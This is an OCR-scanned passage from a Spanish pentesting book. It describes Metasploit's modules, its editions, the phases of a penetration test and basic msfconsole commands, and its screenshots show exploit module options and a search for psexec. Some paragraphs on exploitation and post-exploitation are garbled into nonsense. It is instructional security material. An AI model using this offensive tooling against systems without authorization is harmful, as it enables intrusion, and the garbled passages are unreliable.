client  dos  gather  scanner  sniffer  sqli 

rootgroot: /pentest/exploits/f raniework  3/ modules#  Is  encoders/ 

crad  encoder_test.rb.ut.rb  generic  mipsbe  raipsle  php  ppc  spare  x64  x86 

rootgrout: /pentest/exploits/f rameworka/wodules#  Is  exploits/ 

aix  dialup  hpux  linux  netware  Solaris  windows 

bsdi  freebsd  irix  raulti  osx  unix 

root@root:/pentest/exploits/fra»ework3/modules#  Is  nops/ 

anale  nop_test.rb.ut.rb  php  ppc  spare  tty  x64  x86 

root@root:/pentest/exploits/f  rainework3/iaotlules#  Is  payloads/ 

singles  stagers  stages 

rootQroot : /pentest/exploits/f raraework3/iiiodules#  Is  post/ 
multi  osx  windows 

rootgroot :  /pentest/exploits/f  rai»ework3/modules# _ 

Fig  1 .08:  Modulos  de  Metasploit. 

A  continuacion  se  especifican  los  objetivos  de  los  distintos  modulos  que  componen  el  entorno.  Hay 
que  destacar  que  estos  modulos  son  totalmente  escalabies  facilmente. 

El  mbdulo  auxiliary  proporciona  herramientas  externas  al  framework  para  la  integracion  y  utilization 
con  Metasploit.  De  este  modo  el  auditor  puede  utilizar  escaneres,  herramientas  para  denegacion  de 
servicio,  sniffers,  fuzzers,  etc.  En  la  imagen  anterior  se  puede  visualizar  todas  las  posi bilidades  que 
ofrecen  este  tipo  de  modulos. 

El  modulo  encoders  proporciona  codificadores  para  ofuscar  el  codigo  de  las  shellcodes  y  de  este 
modo  evitar  que  los  sistemas  antivirus  puedan  detectar  el  payload.  En  la  imagen  se  puede  visualizar 
las  distintas  categodas  para  los  encoders,  las  mas  comunes  son  para  arquitecturas  x86  y  x64. 

El  modulo  exploits  es,  quiza,  el  mas  vistoso  de  todos,  en  61  se  encuentran  los  exploits  alojados.  Se 
organizan  mediante  categodas,  por  sistema  operativo  o  tecnologia.  Mas  aclelante  en  el  libro  se  vera 
en  profundidad  distintos  ataques  y  exploits  utilizados  durante  un  test  de  intrusion. 

El  modulo  de  payloads  concentra  los  distintos  codigos  maliciosos  ordenados  tambien  por  categodas. 
En  este  caso,  las  categorias  son  singles ,  stagers,  stages,  y  como  subcategodas  se  organizan  por 
payloads  para  distintas  tecnologias  o  sistemas  operatives. 


El  modulo  de  post  almacena  en  su  interior  codigo  para  ejecutar  acciones  referidas  a  la  fase  de  post- 
explotacion  como  son  la  escalada  de  privilegios,  la  impersonalizacion  de  tokens,  captura  de  pruebas 
sobre  la  maquina  remota,  etc.  Tambien  se  organiza  por  categorias,  como  puede  ser  por  sistema 
operativo. 

\ 

El  modulo  de  nops  contiene  codigo  capaz  de  generar  instrucciones  NOP  para  los  codigos  maliciosos. 
No  existen  gran  cantidad  de  aplicaciones  de  este  tipo  en  el  modulo  de  nops.  Estan  organizados  por 
arquitectura  y  lo  mas  normal  es  utiiizarlo  para  maquinas  x86  o  x64. 


2.  Versiones  de  Metasploit 

Metasploit  dispone  de  3  versiones  distintas  y  claramente  diferenciadas  en  el  mercado  de  la  seguridad 
informatica.  Las  3  versiones  estan  disponibles  a  tvav6s  del  sitio  web  oficial  bttp.V/www.metasploit. 
com  y  disponen  de  distintas  caracteristicas  y  precios.  Por  otro  lado  en  el  sitio  web  definen  a  Metasploit 
framework  como  la  base  de  estas  versiones,  por  lo  que  se  puede  ver  como  que  todas  disponen  del 
framework  como  base. 

Anteriormente,  se  ha  explicado  que  el  proyecto  es  open  source  y  como  tal,  se  dispone  de  una  primera 
version  denominada  Metasploit  Community  Edition.  Esta  edicion  esta  disponible  para  su  descarga 
gratuita  para  sistemas  operativos  Microsoft  Windows  y  Lima.  Normalmenie,  los  usuarios  utilizan 
distribuciones  Linux  donde  ya  se  encuentra  instalada,  dichas  distribuciones  estan  orientadas  a  la 
audilona  de  seguridad  informatica.  .  En  Windows  es  totalmente  funcional,  por  lo  que  tambien  se 
recomiendan  las  pruebas  en  estos  sistemas  operativos,  pero  en  este  librose  ha  utilizado,  generalmente, 
la  distribucion  BackTrack. 

En  esta  web  se  dispone  de  las  otras  2  versiones  de  Metasploit  las  cuales  ya  son  de  pago.  Se  dispone 
de  Metasploit  Pro  y  Metasploit  Express  que  incorporan  un  mayor  numero  de  funcionalidades. 
Tambien  se  dispone  de  distintas  versiones  en  funcidn  del  sistema  operativo. 

Metasploit  Community  Edition 

Esta  edicion  dispone  de  una  gestion  muy  sencilla  para  la  realizacion  de  las  pruebas  de  intrusion  en 
los  sistemas.  En  esta  edicion  se  dispone  de  las  siguientes  caracteristicas: 

-  Una  interfaz  giifica  intuitiva  y  limpia  hace  que  sea  mucho  mas  sencillo  comenzar  con  el  ■ 

proceso  de  verificacion  de  las  vulnerabilidades.  .fy 

-  Identificacion  de  equipos  en  una  red,  puertos  abiertos  y  fingerprint  del  sistema  operafiv<L| 
y  servicios. 

-  Integracion  con  escaneres  de  vulnerabilidades.  Importacion  a  Metasploit  de  los  datp^. 
obtenidos  con  las  herramientas  de  escaneo  como  son  nmap  y  ness  us,  enlre  otros.  ! 
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Base  de  dittos  de  exploits ,  una  de  las  mas  grandes  a  nivel  mondial,  para  garantizar  el  exito 
cn  el  proceso  c!e  intrusion.  Cada  modulo  dispone  de  un  ranking  que  indica  la  lasa  de  exito  y 
el  impacto  de  este  en  el  sistema. 

"  Veri ficacion  sobre  la  posible  explotacidn  de  una  vulnerabilidad,  Metasploit  puede 
veriliear  si  una  vulnerabilidad  es  explotable  o  no,  sin  necesidad  de  probar  a  lanzar  el  ataque. 
hslo  aumenta  la  productividad  y  reduce  el  coste,  ayudando  ademas  a  prevenir  la  violacion  de 
dalos  internes  de  los  sistemas. 

-  Explotacion  en  vivo  y  real  de  los  activos  de  la  empresa.  En  la  mayoria  de  las  ocasiones 
demostrar  que  una  vulnerabilidad  es  crilica  para  la  empresa  puede  ayudar  a  convencer  a  los 
propietarios  de  dichos  activos. 

-  Id  uso  de  esta  version  es  gratoita,  incluso  para  las  empresas,  una  solucion  ideal  para 
presupuestos  ajustados. 


Metasploit  Fro 

F.n  esta  edicion  se  dispone  de  varias  funcionalidades  extra,  ademas  de  las  que  se  ban  visto  en  la 
version  Community  Edition.  A  continuation  se  exponen  las  funcionalidades  adicionales  que  ofrece: 

-  Auditorla  de  conirasenas.  Se  pueden  identificar  patrones  de  contrasenas  debiies,  las . 
ctiales  pueden  ser  vuineradas  mediante  ataques  de  fuerza  brute. 

-  Auditona  de  seguridad  de  la  infraestructura  IT.  Se  pueden  realizar  pruebas  de  intrusion 
sobre  clisposiiivos  de  red,  equipos  de  escritorio,  servidores  donde  se  incluyen  las  bases  dc 
dates  dc  estos  y  las  apiicaciones  web.  Este  ultimo  punto  es  muy  interesanle  para  la  auditona 
de  apiicaciones  web. 

-  Social  engineering.  La  ingenierla  social  es  una  teenies  potente  siempre  que  el  auditor 
sepa  como  explotarla,  con  ella  se  pone  a  prueba  la  concienciacion  del  personal  de  la  empresa. 

-  Reporting.  Informar  a  las  partes  interesadas,  propietarios  de  los  activos  dc  la  empresa  en 
cueslioii,  es  algo  fundamental  y  una  de  las  caracteiisticas  mas  inleresantes. 

-  Automatization  de  los  test  de  intrusion.  Las  empresas,  a  menudo,  solo  pueden  aceptar 
la  comprobacion  in  situ  de  los  equipos,  por  temas  economicos.  Metasploit  Pro  reduce 
drastienmente  ios  costes  automatizando  estas  pruebas. 

-  Simulation  de  ataques.  Una  caractedstica  interesante  es  la  simulation  de  ataques,  desde 
im  punto  de  vista  realista,  tanto  en  redes  IPv4  como  IPv6. 


Metasploit  Express 

i'.sta  edicion  esta  pensada  para  los  profesionales  Tl  que  necesitan  trabajar  con  test  de  intrusion, 
sin  disponcr  de  una  amplia  formacion  o  el  desarrollo  requerido  por  Metasploit  Framework.  Esta 
version  esta  pensada  para  no  requerir.de  ciertas  caracteiisticas  avanzadas  que  se  pueden  encontrar 
cn  Metasploit  Pro.  Las  caracteristicas  base  siguen  siendo  las  mismas  que  en  Community  Edition. 
Tambien  dispone  de  algunas  de  las  caracteiisticas  que  se  han  comentado  en  Metasploit  Pro ,  pero 
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como  curiosidad  se  enuncia  laevaluacion  de  las  redes  IPv6,  asegurando  que  3a.  fed  esta  a  salvo  de  lot 
ataques  en  redes  IPv6,  incluso  si  la  reel  implementada  en  el  entorno  empresarial  sea  una  red  IPv4, 

Para  mayor  in  formacion  sobre  caracteiisticas  en  todas  las  versiones  se  puede  consultar  la  siguiente 
direccion  URL  http://www.rapid7.com/products/penetratiorhtesting.jsp.  \ 


3.  El  test  de  intrusion  o  pentest 

En  este  libro  se  ha  mencionado  en  diversas  ocasiones  la  palabra  pentest test  de  intrusion  o 
penetration  test,  pero  <,que  es  realmente  esto?  /,En  que  timbito  se  esta  hablando?  ^Que  fases  dispone 
un  test  de  intrusion?  ^Arte  o  procedi miento?  Estas  preguntas,  en  algunas  ocasiones,  no  son  faciies 
de  responder  ya  que  pueden  depender  de  di versos  faetores. 

Un  test  de  intrusion,  es  un  metodo  que  evaliia  el  nivel  de  seguridad  de  una  red  de  equipos  o  sistemas 
informaticos.  Se  reaiizara  una  simulacion  de  un  posible  ataque  informatico  con  fines  maliciosos, 
tanto  desde  dentio  de  la  organizacion  objeto,  (los  cuales  pueden  disponer  de  un  cierto  nivel  de 
acceso  a  los  sistemas),  como  desde  fuera  de  la  organizacion,  (sin  disponer  de  ningun  tipo  de  acceso 
autorizado  a  los  sistemas).  El  rol  que  se  dispone  desde  deniro  de  la  organizacion  es  la  de  un  miembro 
de  la  empresa  que  se  encuentra  descontento  y  de  esta  manera  se  puede  simular  hasta  donde  podrta 
llegar.  Por  otro  lado  el  rol  desde  fuera  la  organizacion  seria  la  vision  de  un  hacker  sin  apenas 
m  formacion  de  esfn,  con  lo  que  se  pretende  simular  hasta  donde  podrta  llegarse  desde  fuera. 

El  test  de  intrusion  conlleva  un  analisis  activo  sobre  los  sistemas  para  encontrar  informacion  sobre 
posibles  vuinerabilidades  de  cualquier  tipo.  Estas  vulnerabilidades  podrlan  ser  el  resultado  de  una 
mala  conftguracion  por  parte  del  administrador,  una  mala  implementacion  de  una  aplicacidn  o  un 
fallo  de  seguridad  en  un  sistema  operativo  o  hardware.  Este  analisis  es  llevado  a  cabo  desde  la 
posicion  de  un  atacante,  mencionado  anteriormente,  el  cual  podrla  realizar  la  explotacion  de  las 
vulnerabilidades  de  seguridad  encontradas. 

Eras  el  lanzamiento  de  las  pruebas  de  intrusion  y  la  obtencion  de  los  fallos  de  seguridad  de  la 
organizacion  se  presents  esta  informacion  con  una  evaluacion  precisa  de  los  impactos  potenciales 
a  la  organizacion.  Se  defmen  medidas  tecnicas  para  reducir  los  riesgos  a  los  que  la  organizacion  se 
encuentra  expuesta. 

Los  test  de  intrusion  son  valiosos  y  de  necesidad  en  un  entorno  empresarial  por  las  siguientes  razones: 

-  Identificar  vulnerabilidades  crlticas  o  high  risk  las  cuales  son  el  resultado  de  la  utilizacion 
de  vulnerabilidades  de  menor  riesgo  o  lower-risk. 

-  Identificar  vulnerabilidades  que  pueden  resultar  dificiles  o  practicamente  imposibles  de 
detectar  con  escaneres  de  vulnerabilidades,  los  cuales  automatizan  el  proceso. 

-  Testear  los  sistemas  de  proteccion  de  una  red  para  verificar  su  comportamiento  ante  los 
ataques  y  como  responden  a  estos. 
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-  Evaluar  la  magnitud  de  los  ataques  sobre  los  actives  de  la  organizacibn  y  el  impacto  de 
estos  sobre  las  operaciones  de  la  empresa. 

-  Determinar  la  viabilidad  de  tin  conjunto  de  vectores  de  ataque  sobre  la  organization. 

Los  lest  de  intrusibn  son  tin  coraponente  de  una  auditorla  de  seguridad  completa,  es  deck,  por  si 
solos  no  constituyen  una  auditorla  completa.  Los  test  de  intrusion  forman  parte  de  distintos  tipos 
de  auditorla,  como  son  las  de  caja  blanca  o  caja  negra.  La  principal  diferencia  entre  ambas  es  la 
cantidad  de  information  que  se  dispone  sobre  los  sistemas.  La  auditorla  de  caja  negra  no  presents 
ningun  tipo  de  conotimiento  a  priori,  por  lo  que  ei  penlesier  o  auditor  debera  primero  determinar 
la  localizacibn  e  informacion  sobre  los  sistemas  antes  de  comenzar  el  analisis.  La  auditorla  de  caja 
blanca  ofrece  cierlo  nivel  de  informacion  al  auditor  sobre  la  infraestruelura  a  teslear,  como  puede  ser 
tin  diagrama  de  red,  codigos  fuentes  e  informacion  de  direccionamiento  IP. 

Tambien  existen  las  auditorias  de  caja  gris,  las  cuales  son  una  prueba  intermedia  entre  la  caja  negra 
y  blanca.  Los  test  de  intrusion  se  engloban  en  las  distintas  auditorias  comentadas  anteriormente,  la 
cantidad  de  informacion  de  la  que  se  dispone  a  priori  es  la  que  determina  el  ambito  de  la  auditorla. 

Los  lest  de  intrusibn  disponen  de  distintas  fases,  las  cuales  se  describen  eu  el  siguiente  apartado.  Por 
lo  general,  se  puede  enfocar  el  test  de  intrusion  como  una  serie  de  pasos  que  debe  seguir  el  auditor, 
es  decir,  se  pueden  englobar  en  procedimientos.  En  ciertos  entornos  y  anibilos  el  peniest  se  puede 
entender  como  un  arte,  ya  que  la  experiencia  del  auditor  a  la  hora  de  conftgurar  las  herramientas,  la 
iniuicibn  sobre  algunos  sistemas  y  la  disciplina  a  la  hora  de  llevar  a  cabo  el  test  de  intrusion  pueden 
llevar  a  cumplir  ios  objetivos  de  la  auditoria. 


4.  Fases  del  test  de  intrusion 

Durante  el  test  de  intrusion  se  pueden  destacar  unas  fases  diferenciadas,  con  objetivos  particulars 
distintos  y  tin  objetivo  comun.  El  objetivo  comun  es  claramente  realizar  el  testeo  de  la  organizacibn, 
mientras  que  los  distintos  objetivos  de  cada  fase  son  ayudar  a  la  aportacion  de  informacion  y  pruebas 
sobre  el  estado  de  la  seguridad.  Hay  que  recordar  que  presentar  un  status  de  seguridad  al  cliente  es 
primordial  para  obtener  las  conclusiones  sobre  el  estado  de  su  organizacibn. 

Las  fases  del  test  de  intrusion  son  las  siguientes: 

-  Alcance  y  terminos  del  test  de  intrusion. 

-  Recoleccion  de  informacion. 

-  Analisis  de  las  vulnerabilidades. 

-  Explotacion  de  las  vulnerabilidades. 

-  Post-explotacion  del  sistema. 

-  Generacion  de  informes. 


El  contrato:  alcance  y  terminos  del  test  de  intrusion 

Es  el  punto  de  partida  en  todo  test  de  intrusion,  la  fase  de  la  entrevista,  de  las  palabras.  Se  debe 
ilegar  a  un  acuerdo  sobre  hasta  donde  se  quiere  llegar  con  el  test  de  intrusibn,  cual  es  ei  ambito  de 
la  prueba.  En  otras  palabras,  se  discute  cual  es  el  alcance  y  los  objetivos  buscados  por  el  cliente,  y 
deben  ser  bien  recogidos  por  un  contrato  firmado  por  ambos.  v 

Esta  etapa  es  una  oportunidad  de  ir  haciendo  ver  al  cliente  lo  que  es  realmente  el  test  de  intrusibn  y 
toda  la  informacion  privada  de  la  empresa  que  puede  llegar  a  manejarse.  Se  puede  ver  tambien  como 
una  etapa  educativa  hacia  el  cliente. 

Puede  ocurrir  que  el  cliente  quiera  delimitar  ei  ambito  de  la  prueba,  por  lo  que  se  inctrrporen  ciertas 
restricciones  a!  test.  Estas  restricciones,  siempre  y  cuando  vayan  por  contrato,  deben  ser  tomadas 
muy  en  cuenta  por  parte  del  auditor,  ya  que  la  informacion  que  se  manejara  sera  confidencial. 

Recoleccion  de  informacion 

En  esta  fase  se  recolectara  toda  la  informacion  posible  sobre  la  organizacibn  a  auditar.  Esta 
informacion  puede  ser  obtenida  por  diversos  medios,  ingenieria  social,  medios  de  comunicacibn, 
publicaciones  en  Internet,  google  hacking,  footprint,  etc.  Una  de  las  capacidades  mas  important  es 
en  un  auditor  es  la  posibilidad  de  aprender  como  se  comporta  el  objetivo,  como  funciona,  como  esta 
construido  y  por  ultimo  como  poder  atacarlo. 

Toda  la  informacion  recopilada  sobre  la  organizacibn  es  importante  y  permitira  al  auditor  disponer 
de  una  vision  global  de  ios  tipos  de  controles  de  seguridad  que  existan  en  el  lugar. 

Durante  esta  recoleccibn  de  informaeion  es  importante  identiflcar  que  mecanismos  de  proleceibn  o 
seguridad  existen  en  el  lugar,  para  poder  empezar  a  probar  los  sistemas:  Identiflcar  estas  protecciones 
es  de  vital  importancia  para  poder  estudiar  como  funcionan  estos  sistemas  de  seguridad. 

Analisis  de  vulnerabilidades 

Una  vez  que  se  ha  realizado  la  recoleccibn  de  informacion  se  estara  en  disposicion  de  gran  cantidad 
de  la  misma  y  se  procedera  a  su  analisis.  En  esta  informacion  recopilada  se  pueden  enconlrar 
vulnerabilidades  existentes  en  un  sistema.  Hay  qqe  realizar  un  modelado  con  toda  la  informacion 
recopilada  en  la  que  se  determinar^  el  metodo  de  ataqUe  mas  eficaz.  Este  modelado  train ra  de  buscar 
en  una  organizacibn  como  si  de  un  adversario  se  tratase  y  de  explotar  las  debilidades  como  un 
atacante  lo  haria.  .  :  ; . 

Una  vez  que  se  han  identificado  los  posibies  vectores  o  metodos  de  ataque  con  mayor  viabilidad, 
habra  que  reflexionar  sobre  como  acceder  al  sistema,  Por  acceder  se  entiende  que  el  posible  ataque 

que  lance  el  auditor  disponga  de  una  via  de  conexibii  liacia  al  sistema  a  explotar. 

■  ■  ’’  '  ' 

El  analisis  de  vulnerabilidades  debe  ser  conibljiado.  con  la  informacion  que  el  auditor  ha  ido 
aprendiendo  en  la  fase  anterior.  En  otras  palabras,-,ql  analisis  de  vulnerabilidades  utiliza  informacion 
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sobie  puertos,  escaneos  de  vulnerabilidades,  dates  recogidos  e  inform, icion  rccolectada  en  la  foe 
01  p,u  a  ",dltar  al  aildltor  la  via  adcciiada  de  acceso  a  la  fase  de  explotacion. 

Explotacion  de  las  vulnerabilidades 

™tae|“  !^r°Cidar?d°S  ,eCt0reS’  y  la  *»  mas  ""«*>  aPOrta  al  procesn  de 

•  rero  irl  dn  ,  q“e  a“d,t°:.S,ente  Cl  C0SC|Uiile°  “  “ interior  y  611  >«  Mue  se. comp, ohara 

tvd  f  th  T'°n  y  de  VUlneral)ilida(lea  fueron  comctos  o  si  por  el  contrario 

tayo  cm  un  jhIso  positivo. 

™  T*  Si,r  disrne  *  ,a  certeza  de  1,06  ob!e,’dremos  ™  Hurtado  positive 
'  prucU,.A  1melnud0’ se  utll,zan  herramientas  para  automatic  esta  fase  y  se  lanzan  exploits 
PWK'  ‘ e  d!cba  carSe2a-  TamPoco  «  una  mala  polltica,  ya  que  la  milomatizacidn  del  proeeso 

l '  P  emendlcl"  com«  una  baena  praclica,  pero  el  auditor  esta  perdiendo  el  control  sobre  io  uuc 
esta  sucediendo  en  el  entorno  de  la  organization.  que 

^  h iVa' S!  del;e  dispT  de  la  certeza  de  el  sistema  es  vulnerable  para,  disponiendo  del 
“m  te  X  ^,8° q“e  deVUeiV; 61  T01  S°bre  d  Siste™'  La»-  a  degas  no  L 

t  Zle  ll  coi  te  soS  I86™  °  T  la  0r8‘"’i2aci».  *> «  »■»  a-i6n  productiva  y  ademas 

se  P,eule  ei  sobre  io  que  se  esta  haciendo. 

Per  el  contrario,  se  puede  automatizar  el  proeeso  de  lanzamiento  de  exploit,  sobre  las  cert-z- 

deClr’  S1,b'end°  7  U"  SiStema  diSP°"e  *  Va™s  vu I nerabil idades  se  puede 
an lomai  izai  eJ  proeeso  para  expiotar  todas  estas.  * 

CSpiiCada  “  may°r  detaHe  * traV&  de'  US0  de  m°sPhi'  tnSs  adelante 


Post-explotacton  del  sistema 

•tli,orSp,T ‘f rdE  ’aS  mt inlcresantes  y  <*»  "»y«>r  cantidad  de  excitacibn  puede  provocar  en  el 
and,  o,.  bn  esta  fase  ya  se  d.spone  de  acceso  a  algdn  sistema,  pero  se  puede  mtantar  acceder  a  otro 
que  tengan  un  mayor  peso  en  la  organizacidn. 

t  controhdoTZ  ■“  °'  aUdil“rdispone  de  acces0  »  ™A<3oina,  la  cual  tione  acceso  directo  a 
se  ,!en!e  ‘ TnM\el  Pas  estudiarlo  a  (raves  de  la  maquina  vulnerada  en  primer  lunar 

int  ,  eS VUlnerable- 6516 COntrolador de domi"io '™da serexplotado por ellu  i  o  ’ 

.1  Paves  de  la  pitmen  itriqmm.  Con  esta  accion,  se  demuestra  al  propielario  de  la  oruanizaejo  ei 
gran  unpacto  que  supone  que  maquinas  con,  a  priori,  menor  peso  en  la  emp^llZZ 

AdcmSs  en  esta  fase  se  puede  obtener  informacion  sensible,  muy  interesante  para  el  informe  final 

,  ,_7"P  °' CUentaS  de  usuarlos.  •»»  o»lra  pueden  proporcionar  al  auditor  acceso  a  otras  maquinas 
del  organ, zac, on  y  segutr  poniendo  a  prueba  otros  sistemas  dentro  de  la  empresa.  La  fase  de  o 
explotacion  sera  tratada  en  este  libro  dotindola  de  la  importuned,  que  dispone  en  u„  «  de1„3  '. 
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Generation  de  informes 

Esta  fase  refleja  ia  importancia  de  comunicar  todo  el  proeeso  que  se  ha  ido  realizando  en  la 
oiganizacion.  Es  impoi  (ante  que  el  auditor  vaya  docunientando  todas  las  aceiones  y  procedimientos 
devados  a  cabo  cluiante  el  test  de  intrusion.  Cada  fase  debe  estar  documentada  en  mayor  o  menor 
niedida,  y  es  una  buena  practiea  no  dejar  para  el  final  todo  este  proeeso,  Quiza  la  generacion  del 
informe  se  la  fase  mas  reievante  e  importante  del  test  de  intrusion' 

En  estos  doeumentos  sc  debe  explicar  que  trabajo  se  ha  realizado  en  la  organizacion,  como  se  ha  hecho 
dicho  trabajo,  es  uecir,  herramientas  y  tecnicas  utiiizadas,  y  lo  mas  importante,  que  vulnerabilidades 
han  sido  descubiertas  durante  el  testeo  de  la  organizacion.  Como  rnlnimo  el  informe  debe  ser 
dividido  en  2,  bien  difereneiados,  como  son  ei  ejecutivo  y  el  teenico. 

hi  in  forme  teenico  es  un  documento  con  gran  nivei  de  detalle  en  el  que  se  especifican  todas 
las  aceiones,  con  las  herramientas,  que  se  han  ido  utilizando  y  los  resultados  que  se  han  ido 
obteniendo.  Ademas,  debe  acorn  pan  arse  de  una  lista  que  indique  como  subsanar  esos  riesgos  y  unas 
recomendacfones  del  auditor. 

al  in  forme  ejecutivo  es  un  documento  mas  ameno  y  liviano  en  el  que  se  deben  especificar  las 
vulnerabilidades  encontradas,  pero  sin  ningun  nivei  teenico.  Todo  debe  estar  explicado  de  tal  manera 
que  cualquier  persona  sin  capacidades  tecnicas  entienda  que  riesgos  existen  en  la  organizacion. 
Ademas,  el  propiefario  de  la  organizacion  esperara  sus  recomendaciones  como  profesional  de  la 
segundad,  por  io  que  en  este  mforme  debe  existir  dicha  lista. 


5.  Comandos  basicos  de  Metaspioit 

La  interaccion  con  d  framework  puede  llevarse  a  cabo  mediante  el  uso  de  distintas  interfaces  como 
se  ha  explicado  anteriormente.  En  la  mayoria  de  las  ocasiones  se  utiliza  la  consola  de  Metaspioit 
para  realizar  las  pmebas  y  gestionar  todas  las  herramientas  disponibies  en  el  framework, 

Gn  un  primer  moinenio,  ia  consola  puede  provocar  cierto  rechazo  o  temor  al  usuario,  ya  que  por  lo 
general  la  mayoria  de  usuarios  prefieren  el  uso  de  una  interlaz  amigable  e  intuitiva.  La  consola  de 
Metaspioit  es  bastante  intuitiva  y  sencilla  de  utiltzar,  integrando  comandos  con  semantica  implicita 
ios  cuales  ayudaran  al  usuario  a  configurar  y  moverse  por  el  entorno  de  manera  sencilla. 

Pary  ianzar  la  consola  de  Metaspioit  se  ejecutard  en  una  terminal  el  comando  msfcomole,  el  cual 
devolvera  al.  usuario  un  prompt  para  ia  introduccion  de  comandos,  un  banner  e  informacion  sobre  el 
numero  de  exploits,  payloads,  encoders,  auxiliary  y  nops. 

Antes  de  empezar  a  enumerar  comandos  y  sus  objetivos,  se  debe  tener  claro  como  se  estructura, 
y  accede  a  los  elementos  disponibies  t\d  framework.  Se  puede  imaginar  la  consola  de  Metaspioit 
como  un  mini  sistema  de  archivos,  ei  cual  dispone  de  una  rafz  y  carpetas  que  ctielgan  de  el.  Las 
carpetas  que  cuelgan  de  el,  realmente  se  encuentran  fisicamente  en  la  ruta  donde  esta  instalado  el 
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framework.  Por  ejempio,  si  se  requiere  utilizar  un  exploit ,  estos  se  encontraran  en  alguna  ruta,  como 
puede  ser  explo  i  (/win  do  ws/sm  b/ pa  exec. 

root@root:-#  msfconsole 

o  8  o  o 

8  8  8 
ooVoYo.  . oPYo.  o8P  .oPYo.  .oPYo.  .oPYo.  8  .oPYo.  08  o8P 

8 '  8  8  8aooo8  8  . 00008  Y!) , .  8  8  8  8  8  8  8 

3088.  B  8  8  'Yb.  8888888 

888  Yooo 1  8  * Y00PO  ‘YooP'  8Y00P'  8  'YooP'  8  8 


=(  laetasploit 
+  --  --=j  684  exploit 
t  --  --sj  217  payloat 

iiisf  >  | 

vi. 7.0  release  [core: 3. 7  api 
:s  *  355  auxiliary 

Is  -  27  encoders  -  8  nops 

1.0] 

Fig  1 .09:  Lanzamiento  de  msfconsole  con  informacion  sobrc  el  framework. 


Otro  ejempio  podria  ser  si  se  requiere  la  utiiizaciou  de  un  modulo  auxiliary,  una  ruta  posible  seria  la 
siguiente  auxiliary/scanners/smb/smb2.  De  estos  2  ejemplos  se  deduce  que  si  se  requiere  utilizar  un 
encoder  su  ruta  comenzara  por  encoder/<lecnologia>  y  asi  ocurre  con  los  demas  tipos  de  modules 
de  los  que  se  dispone  en  el  framework. 

Para  acceder  y  obtener  informacion  a  exploits ,  encoders ,  payloads ,  etc,  se  disponen  de  ciertos 
comandos  que  se  iran  explicando  a  continuation,  pero  antes,  hay  que  destacar  lo  que  son  los 
elementos  del  framework.  Se  pueden  entender  como  variables  que  se  deben  configurar  en  el  interior 
de  un  exploit  u  otros  mddulos  con  los  que  se  trabaje.  Es  decir,  cuando  se  quiere  configurar  un 
exploit,  o  un  encoder,  payload,  etcetera,  se  disponen  .de  unas  variables  que  deben  ser  cpnfiguradas 
con  informacion  aportada  por  el  auditor.  Por  ejempio,  si  se  esta  conftgurando  un  exploit  que  se  va  a 
lanzar  contra  un  equipo,  existen  ciertas  variables  o  parametros  que  deben  ser  proportion ados  por  el 
auditor  como  son  la  direction  IP  o  nombre  de  la  maquina  sobre  la  que  se  lanzara  el  exploit,  puerto 
de  destino,  configuration  del  payload,  en  el  caso  de  que  se  intente  provocar  la  ejecucion  de  codigo 
remoto  y  tomar  el  control  de  la  maquina.  Estos  elementos  o  variables  se  muestran  en  mayusculas, 
algo  que  llamara  la  atencion  del  auditor.  Algunas  variables  son  opcionales  y  otras  son  totalmente 
obligatorias  de  configurar. 


Module  options  (exploit/milti/browser/jav 

a_signed_applet); 

None 

Current  Setting 

Required 

Description 

APPLETUAME 

SiteLoader 

yes 

The  *ain  applet's  class  na®e. 

CERTCN 

Metasploit  Inc. 

yes 

The  CH=  value  for  the  certificate. 

SRVHOST 

0.6. 9. 6 

yes 

The  local  host  to  listen  on.  This  must  be  an  address  on 

the  local  nachine  or  e.B.8.0 

SRVP0RT 

8680 

yes 

The  local  port  to  listen  on. 

SSL 

false 

no 

Negotiate  SSL  for  incoming  connections 

SSLVersion 

5SL3 

no 

Specify  the  version  of  SSL  that  should  be  used  (accepte 

d:  SSL2,  SSL3, 

TL51) 

URIPATH 

no 

The  URI  to  use  for  this  exploit  (default  is  random) 

Fig  1.10:  Variables  de  un  modulo  de  Metasploit. 


Comandos  de  ayuda  y  busqueda 

Existen  numerosos  comandos  de  msfconsole  los  cuaies  proporcionan  ayuda  at  usuario  dando 
informacion  sobre  acciones  que  se  pueden  realizar  con  d framework  o  informacion  sobre  los  modulos 
disponibles.  Ademas,  resultan  de  gran  utilidad  los  comandos  para  realizar  busquedas  dentro  <fle  la 
estructura  de  Melasploil. 

Comando:  help 

El  comando  help  proporciona  un  listado  sobre  todos  los  comandos  de  consola  disponibles.  si 
pueden  observar  2  listas  diferenciadas,  core  commands  y  database  backend  commands.  La  primera 
proporciona  un  listado  sobre  los  comandos  del  nucleo  dd  framework,  y  la  segunda  ofrece  otro1  sobre 
los  comandos  que  interactiian  con  las  bases  de  datos. 

Existe  la  posibilidad  de  usar  el  parametro  -h  con  los  comandos  para  obtener  una  ayuda  detaflada 
sobre  la  utilizacion  de  dicho  comando.  Por  ejempio,  search  -h,  o  incluso  utilizando  el  comando  help 
delante  del  comando  del  que  se  requiere  informacion  o  ayuda,  help  search. 

Comando:  search 

El  comando  search  resulta  de  gran  utilidad  para  el  auditor  para  la  busqueda  de  modulos  en  fund  oil 
de  alguna  caracteristica  concreta.  Tambien  se  puede  utilizar  cuando  el  auditor  tiene  que  compmbar 
si  el  framework  se  encuentra  actualizado,  por  ejempio  mediante  la  busqueda  de  algun  exploit  que  se 
aproveche  de  alguna  vulnerabilidad  conocida  recientemente. 


msf  >  search  psexec 

1*1  Searching  loaded  modules  for  pattern 

Exploits 

'psexec1 . . . 

Name 

Disclosure  Date 

flank 

Description 

windows /smb/psexec 

1999-01'81 

manual 

Microsoft  Windows  Authenticated  User  Code  E 

xecution 

windows/smb/smb_relay 

2001-83-31 

excellent 

Microsoft  Windows  SMB  Relay  Code  Execution 

Fig  1.11:  Busqueda  de  modulos  con  cierlas  caraclensticas. 


Como  se  puede  observar  tras  realizar  la  busqueda  de  un  modulo  con  ciertas  caracteristicas  se  obtienen 
las  rutas  donde  se  aiojan  y  donde  se  puede  acceder  al  recurso.  En  este  ejempio,  se  puede  visuaiizar 
como  se  obtienen  exploits ,  pero  si  existiesen  herramienlas,  payloads,  encoders  que  cumpliesen  con 
el  patron  de  busqueda  tambien  se  obtendrian  sus  rutas  para  que  el  auditor  pudiera  acceder  a  cilas  de 
mauera  sencilla. 

Comandos:  info  y  show 

El  comando  info  aporta  gran  cantidad  de  informacion  sobre  el  modulo  seieccionado  previameute 
en  la  consola  mediante  el  comando  use,  o  ejecutando  el  comando  info  seguido  de  la  ruta  donde  se 
